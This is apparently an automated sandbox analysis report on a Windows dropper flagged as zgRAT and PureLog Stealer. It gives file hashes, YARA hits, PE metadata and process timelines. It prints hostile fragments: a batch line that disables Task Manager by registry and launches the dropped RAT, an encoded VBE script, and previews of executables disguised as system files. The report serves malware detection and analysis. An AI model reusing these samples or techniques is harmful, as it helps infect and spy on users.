                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Windows\System32\CSC2AA1D359FACC4CB2A858F49C46B13997.TMP

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):1224
                                                          Entropy (8bit):4.435108676655666
                                                          Encrypted:false
                                                          SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                          MD5:931E1E72E561761F8A74F57989D1EA0A
                                                          SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                          SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                          SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                          Malicious:false
                                                          Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                          C:\Windows\System32\SecurityHealthSystray.exe

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4608
                                                          Entropy (8bit):3.931759895805073
                                                          Encrypted:false
                                                          SSDEEP:48:69J7PtcjM7Jt8Bs3FJsdcV4MKe27d32vqBHeOulajfqXSfbNtm:cPlPc+Vx9MV2vk4cjRzNt
                                                          MD5:D2CC4F2CD282AFD18389D0D3FD30C3AC
                                                          SHA1:00C10A30817655479A10CA63E28803DCDBEFEE05
                                                          SHA-256:C2A5FE4847A53D9176354CA1C63D39FA5FDCC50776D552C04BF78BD522BFC3C9
                                                          SHA-512:1678DD11D1317A3F4D6388F2532780D12689870C7ABAC966C586632244F613F3FC797511DC79E8B31D03BA20EE13D1E4CDEAA9E3580FBEE8D60A84DC3AF12A99
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....`sg.............................'... ...@....@.. ....................................@.................................<'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p'......H.......(!................................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                          C:\fontdriversavescrt\24dbde2999530e

                                                          Download File
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:ASCII text, with very long lines (469), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):469
                                                          Entropy (8bit):5.855450311037231
                                                          Encrypted:false
                                                          SSDEEP:12:BcZ4a7hvEHa2j3fairsN16AKvCw/euGdgdH+tFqSx0WJF6:BcZ4atvEHDDS4sHK1eLw8Em0MA
                                                          MD5:B471EB0AAD0AD87C653CF5065FA61F4A
                                                          SHA1:694A64A5596A13249C030495A42753EFB084E3FE
                                                          SHA-256:5602474BABBE8E2DAB1AB714CA16F49C864221F9076F5820BC8A98A2E4FCAA82
                                                          SHA-512:021AD460F402D12EF3467A4E52900E25015535DC205402C9147DF1CA59ACDF0E5438AA53760CDB698BE3990A66EC3F4B1E22D93E447FA61D703540133836B64A
                                                          Malicious:false
                                                          Preview:4hUGp3892YtESk5IEX0XfhpwNTKdn44T4rgrhwmLLoVFmqG93KXv8m7X1h3WseV7eaJkDNlRvpM1LkJhMKjdgIURuJ093PcqSYlMgg5qjGATaFLRYVKh52aVG104XlXfMfix87AqP33aIB1o7ikhF4ua7QGopBS7tfG4hYTbUdSC8AMEAL7zAzZSuHzs1WANl6rn56HiPJNllsb6DBndEd63FyKZjlk8dFbCTjJDEYj1mxqBq3ozsgJHAxhHwr9ojOIgRZmd2kZp3FQSHItp6uP66TCgCCRXY5RXpKuQQK7IHdO4gP9n8Try9Lk8XGbzSCR8x3m7YcZvxHzcEH9xCnYFNdYdkv3JtHzEMQHnmCPf36B1VH3PHoxpnLuTeIWmiQCpRuQy9VKAX2LRbgId1oCFUKbAfyJepm7n4Vkl0FQwewRuAd17A3v4N7VHTQSLLqUv5hXG6hmvXQlh2qAC6

                                                          C:\fontdriversavescrt\86b7f9ef8ac2e1

                                                          Download File
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:ASCII text, with very long lines (503), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):503
                                                          Entropy (8bit):5.8731118905923845
                                                          Encrypted:false
                                                          SSDEEP:12:FNpMriHkuvrnJpzDzCfWqsBLk88tEpCRCeHxM82mW2X/Kc:F7PPnnzDzKZs9n8tEG9Hh2mvt
                                                          MD5:1B47589743AC0159B3627BF815242A34
                                                          SHA1:318636755B518E54DB01044649B371D049F6D79B
                                                          SHA-256:58DDC2F31160596651EB92E7825589F753C70A2E22468FE15970475E9CCADC96
                                                          SHA-512:41B457046A851E9132724D34F86891003954E61E0FF8EE341BA70E13A5C18AAC77BA8252D31B45491E733B3EEABF784936E34680E13BD369F8833F4629493456
                                                          Malicious:false
                                                          Preview:a1BidN6VnwPPkXnyO0P66BhSvky7SqAtiF0LMDaVm4bIuFLoIezGApiYUsw3Z9C7wfqegbmKZ3UCkYiqYJzx03s3hc1dQh6n1eVPYrHq2oqGVgy5KGePJOG2ww7EjI327rKFDSRrBI5LNliAn6SKCqdnXdcmtDHtuxJoWs21yxNBT4pKO6an0tzQNhrk0p78BLbZc4o4EbVPdbTcySXxmd3B82azARBJ0PAHdPrTSgjYXkxwNPwhRKVhSZbkez3wZMYNbM8ikDeG3eoXEnlvfd1p3czExHzdmx9LLkVBQN6NpPnxvEf0NHQ6UsU8W4vdOBdGfcLeSkfSgnAoyBTtl8QegD0cQWoVcd9ovgSS2Binm7ZqspJVlB1Pu8kclsO55K0DoV3RtA1kan2inKukMTualt3w60qJxmrbHWCWw2mkKRzHFByb8nslZZb4cGV2Urwx5aaRHXxUrJQU4vq4BOLJ4FCr4H4qhtQdeBMokhUl0X4PJH9qZa0

                                                          C:\fontdriversavescrt\ComComponentDriverInto.exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\KzLetzDiM8.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):2039296
                                                          Entropy (8bit):7.577687284159168
                                                          Encrypted:false
                                                          SSDEEP:49152:IeWIu4wEKRrqO5Tz2ZqORRlpK6aGAA/3:IvfNEqORbajA/
                                                          MD5:715951FB52F5F8D7603E8E2B1DB98A4D
                                                          SHA1:99302EA1E8E802AC39B9A7E5A1FC63E2C1CBAEFA
                                                          SHA-256:E86BBF4C032BC999352EE883A862A9219607244D571CE220526DB0AE35F8E5F9
                                                          SHA-512:7C04B6243E6248657CB71C9FA0210C6C9D361BE0A23AFAE2EE933090F345826B48A0496522027E1C0EBDD68B666843EB07C74819560080AB9ECDFFA4248D8DF8
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\fontdriversavescrt\ComComponentDriverInto.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\fontdriversavescrt\ComComponentDriverInto.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 78%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.ng............................n4... ...@....@.. ....................................@................................. 4..K....@.. ....................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc... ....@......................@....reloc.......`......................@..B................P4......H........... ...........0...NP...3.......................................0..........(.... ........8........E........*.......9...8....*(.... ....~{...{....:....& ....8....(.... ....8....(.... ....~{...{....:....& ....8........0.......... ........8........E........6..._...........8....r...ps....z*...... ....~{...{....:....& ....8....~....:.... ....~{...{....:....& ....8........~....(J...~....(N... ....?.... ....~{...{....:R...& ....8G...~....(B... .... .... ....s....~....(F....

                                                          C:\fontdriversavescrt\EgkshvK6qarKZkry.bat

                                                          Download File
                                                          Process:C:\Users\user\Desktop\KzLetzDiM8.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):215
                                                          Entropy (8bit):5.264743917421015
                                                          Encrypted:false
                                                          SSDEEP:6:NcStuH1jhRiI36BNPexUTQYAfzGBIIyxg:QVjhR136NPL8tL0yq
                                                          MD5:12341E65B9B68859034CE10B46AED8BF
                                                          SHA1:E1E747F8F805BED100508C20AB3069252FED2C3C
                                                          SHA-256:884DDB071EB119926AE99CF11D81E96C09C25D593701B9C49CBC071445835ED8
                                                          SHA-512:9F99158522F612455CD454D945B9147C7C810071889B6A18C320DD5CC688D471B7589FA948B4B9FD82EC5BB3AF4DD39F672BA1B52728A63B20974DE72E06DD72
                                                          Malicious:false
                                                          Preview:%Ycv%reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f%ZfvUhsLtn%..%qNWqSpvyixGQlNk%"%SystemDrive%\fontdriversavescrt/ComComponentDriverInto.exe"%VWTILvCL%

                                                          C:\fontdriversavescrt\VC6VnT3ED3x5xNRNDrSFzjvQXKeB6kXLUZIf41P3hi0I8ZK.vbe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\KzLetzDiM8.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):224
                                                          Entropy (8bit):5.750401741174558
                                                          Encrypted:false
                                                          SSDEEP:6:GPwqK+NkLzWbH1rFnBaORbM5nCIjHx8LnE56Cpl:GWMCzWL1hBaORbQCIjd6Cpl
                                                          MD5:E4A0EBA820478624DC3D0BFB7BD8F01C
                                                          SHA1:A343C39F539E67D7A237AE970E4CC17D31158083
                                                          SHA-256:A1C66C765284A92DB3BA7BECA1B97902BA5C27471D23FC684F03219196B1478A
                                                          SHA-512:B60975C19C3F50CB5BC09C7F36BC0B335634369B526535D9A87C84C0AFA12F07520BE0F87688D19FE4AD34C30BBCB43470899B621EAC551DC15A9BB325031167
                                                          Malicious:false
                                                          Preview:#@~^xwAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v 0!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPrYUXdD+sfDb\.Yz6WUY9Dr-.D/m-+kmDD&&2T3kt-|.5mDF}0.Xc4COr~PTS,0CVknIkEAAA==^#~@.

                                                          C:\fontdriversavescrt\WmiPrvSE.exe

                                                          Download File
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):2039296
                                                          Entropy (8bit):7.577687284159168
                                                          Encrypted:false
                                                          SSDEEP:49152:IeWIu4wEKRrqO5Tz2ZqORRlpK6aGAA/3:IvfNEqORbajA/
                                                          MD5:715951FB52F5F8D7603E8E2B1DB98A4D
                                                          SHA1:99302EA1E8E802AC39B9A7E5A1FC63E2C1CBAEFA
                                                          SHA-256:E86BBF4C032BC999352EE883A862A9219607244D571CE220526DB0AE35F8E5F9
                                                          SHA-512:7C04B6243E6248657CB71C9FA0210C6C9D361BE0A23AFAE2EE933090F345826B48A0496522027E1C0EBDD68B666843EB07C74819560080AB9ECDFFA4248D8DF8
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\fontdriversavescrt\WmiPrvSE.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\fontdriversavescrt\WmiPrvSE.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 78%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.ng............................n4... ...@....@.. ....................................@................................. 4..K....@.. ....................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc... ....@......................@....reloc.......`......................@..B................P4......H........... ...........0...NP...3.......................................0..........(.... ........8........E........*.......9...8....*(.... ....~{...{....:....& ....8....(.... ....8....(.... ....~{...{....:....& ....8........0.......... ........8........E........6..._...........8....r...ps....z*...... ....~{...{....:....& ....8....~....:.... ....~{...{....:....& ....8........~....(J...~....(N... ....?.... ....~{...{....:R...& ....8G...~....(B... .... .... ....s....~....(F....

                                                          \Device\Null

                                                          Download File
                                                          Process:C:\Windows\System32\w32tm.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):151
                                                          Entropy (8bit):4.721736326371302
                                                          Encrypted:false
                                                          SSDEEP:3:VLV993J+miJWEoJ8FX4ks5XXKvrPUmNvj:Vx993DEUssJXvmx
                                                          MD5:0299EE506C9C18EACEF090C85B561F8A
                                                          SHA1:452D0422D26F1400BA578CEAF55B19D2BB5CD4D6
                                                          SHA-256:25F000BAD8DBB060F683EB21CA65A72FB29896BAAB6AF7CA59BF105723872D32
                                                          SHA-512:44D906636A9BC895A048BF1047D4130302ED514AA5861D0211F2EDF5FCF57197C5AE65A14C57D7378174FF7A83D405A57A2D56A2C389DF237715C614B024D1B5
                                                          Malicious:false
                                                          Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 30/12/2024 22:10:27..22:10:27, error: 0x80072746.22:10:32, error: 0x80072746.

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.919073947748398
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:KzLetzDiM8.exe
                                                          File size:1'896'756 bytes
                                                          MD5:a554052564261d9d5c7e0cd92514d3a0
                                                          SHA1:36187b2e29881e34a3fa51dd32b89c6bddcc68c6
                                                          SHA256:06effa75c48b51ef222da511c8550ff450947fd326389fa7d60613c79760d407
                                                          SHA512:2a5c5524bf20b870c7e747beaabd3c5fbd894b3c8878005127fd7b5950be87c69c519b156aad600d771c9c7d2566b4e3b4e65e5a89b4441417839a41e939ad06
                                                          SSDEEP:24576:2TbBv5rUyXVMh3/cVBxJWzAuxM8bxjC8PMUdaOQuvBc2f4N5zsVeXmnntz+xlHU7:IBJ8EHWcgbRCOU1E8sVWSt6x7m1DlPm2
                                                          TLSH:DD952312BAC5D4B3D0A3083616296B21A53D7C602FBACEEF53E4296DD5316C0D7317AB
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                                          File Icon

                                                          Icon Hash:1515d4d4442f2d2d

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x41f530
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:12e12319f1029ec4f8fcbed7e82df162

                                                          Entrypoint Preview

                                                          Instruction
                                                          call 00007F56D080CE6Bh
                                                          jmp 00007F56D080C77Dh
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push ebp
                                                          mov ebp, esp
                                                          push esi
                                                          push dword ptr [ebp+08h]
                                                          mov esi, ecx
                                                          call 00007F56D07FF5C7h
                                                          mov dword ptr [esi], 004356D0h
                                                          mov eax, esi
                                                          pop esi
                                                          pop ebp
                                                          retn 0004h
                                                          and dword ptr [ecx+04h], 00000000h
                                                          mov eax, ecx
                                                          and dword ptr [ecx+08h], 00000000h
                                                          mov dword ptr [ecx+04h], 004356D8h
                                                          mov dword ptr [ecx], 004356D0h
                                                          ret
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push ebp
                                                          mov ebp, esp
                                                          push esi
                                                          mov esi, ecx
                                                          lea eax, dword ptr [esi+04h]
                                                          mov dword ptr [esi], 004356B8h
                                                          push eax
                                                          call 00007F56D080FC0Fh
                                                          test byte ptr [ebp+08h], 00000001h
                                                          pop ecx
                                                          je 00007F56D080C90Ch
                                                          push 0000000Ch
                                                          push esi
                                                          call 00007F56D080BEC9h
                                                          pop ecx
                                                          pop ecx
                                                          mov eax, esi
                                                          pop esi
                                                          pop ebp
                                                          retn 0004h
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 0Ch
                                                          lea ecx, dword ptr [ebp-0Ch]
                                                          call 00007F56D07FF542h
                                                          push 0043BEF0h
                                                          lea eax, dword ptr [ebp-0Ch]
                                                          push eax
                                                          call 00007F56D080F6C9h
                                                          int3
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 0Ch
                                                          lea ecx, dword ptr [ebp-0Ch]
                                                          call 00007F56D080C888h
                                                          push 0043C0F4h
                                                          lea eax, dword ptr [ebp-0Ch]
                                                          push eax
                                                          call 00007F56D080F6ACh
                                                          int3
                                                          jmp 00007F56D0811147h
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push 00422900h
                                                          push dword ptr fs:[00000000h]

                                                          Rich Headers

                                                          Programming Language:
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000xdff8.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000x233c.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x640000xdff80xe000ba08fbcd0ed7d9e6a268d75148d9914bFalse0.6373639787946429data6.638661032196024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x720000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          PNG0x646500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                          PNG0x651980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                          RT_ICON0x667480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                                          RT_ICON0x66cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                                          RT_ICON0x675580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                                          RT_ICON0x684000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                                          RT_ICON0x688680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                                          RT_ICON0x699100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                                          RT_ICON0x6beb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                                          RT_DIALOG0x705880x286dataEnglishUnited States0.5092879256965944
                                                          RT_DIALOG0x703580x13adataEnglishUnited States0.60828025477707
                                                          RT_DIALOG0x704980xecdataEnglishUnited States0.6991525423728814
                                                          RT_DIALOG0x702280x12edataEnglishUnited States0.5927152317880795
                                                          RT_DIALOG0x6fef00x338dataEnglishUnited States0.45145631067961167
                                                          RT_DIALOG0x6fc980x252dataEnglishUnited States0.5757575757575758
                                                          RT_STRING0x70f680x1e2dataEnglishUnited States0.3900414937759336
                                                          RT_STRING0x711500x1ccdataEnglishUnited States0.4282608695652174
                                                          RT_STRING0x713200x1b8dataEnglishUnited States0.45681818181818185
                                                          RT_STRING0x714d80x146dataEnglishUnited States0.5153374233128835
                                                          RT_STRING0x716200x46cdataEnglishUnited States0.3454063604240283
                                                          RT_STRING0x71a900x166dataEnglishUnited States0.49162011173184356
                                                          RT_STRING0x71bf80x152dataEnglishUnited States0.5059171597633136
                                                          RT_STRING0x71d500x10adataEnglishUnited States0.49624060150375937
                                                          RT_STRING0x71e600xbcdataEnglishUnited States0.6329787234042553
                                                          RT_STRING0x71f200xd6dataEnglishUnited States0.5747663551401869
                                                          RT_GROUP_ICON0x6fc300x68dataEnglishUnited States0.7019230769230769
                                                          RT_MANIFEST0x708100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                          Imports

                                                          DLLImport
                                                          KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                          OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                          gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                          Possible Origin

                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishUnited States

                                                          Network Behavior

                                                          No network behavior found

                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:20:21:53
                                                          Start date:30/12/2024
                                                          Path:C:\Users\user\Desktop\KzLetzDiM8.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\KzLetzDiM8.exe"
                                                          Imagebase:0x1e0000
                                                          File size:1'896'756 bytes
                                                          MD5 hash:A554052564261D9D5C7E0CD92514D3A0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1655967326.00000000069EB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:1
                                                          Start time:20:21:53
                                                          Start date:30/12/2024
